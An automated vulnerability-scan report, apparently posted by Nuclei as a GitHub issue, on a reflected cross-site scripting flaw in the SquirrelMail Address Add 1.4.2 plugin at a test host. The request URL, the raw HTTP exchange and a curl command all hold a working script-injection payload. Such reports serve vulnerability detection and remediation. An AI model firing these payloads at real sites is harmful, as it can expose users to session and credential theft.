search

mkrs2404 / tickets

0 stars 0 forks source link

SquirrelMail Address Add 1.4.2 - Cross-Site Scripting (squirrelmail-address-xss) found on honey.scanme.sh #11

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: squirrelmail-address-xss matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

Timestamp: Tue Apr 30 13:42:05 +0000 UTC 2024

Source: https://cloud.projectdiscovery.io/vuln/4b0e0520b8a222cec29b3c746a2cbf30

Template Information

Key Value
Name SquirrelMail Address Add 1.4.2 - Cross-Site Scripting
Authors dhiyaneshdk
Tags edb, xss, squirrelmail, plugin
Severity medium
Description SquirrelMail Address Add 1.4.2 plugin contains a cross-site scripting vulnerability. It fails to properly sanitize user-supplied input, thus allowing an attacker to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CVSS-Metrics CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE-ID CWE-80
CVSS-Score 5.40

Request

GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.49
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 351
Content-Type: text/html
Date: Tue, 30 Apr 2024 13:42:05 GMT

GET /plugins/address_add/add.php?first=HOVER ME!</script><script>alert(document.domain)</script> HTTP/1.1
Host: honey.scanme.sh
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.49

References:

CURL command

curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.49' 'https://honey.scanme.sh/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

Generated by Nuclei v3.2.5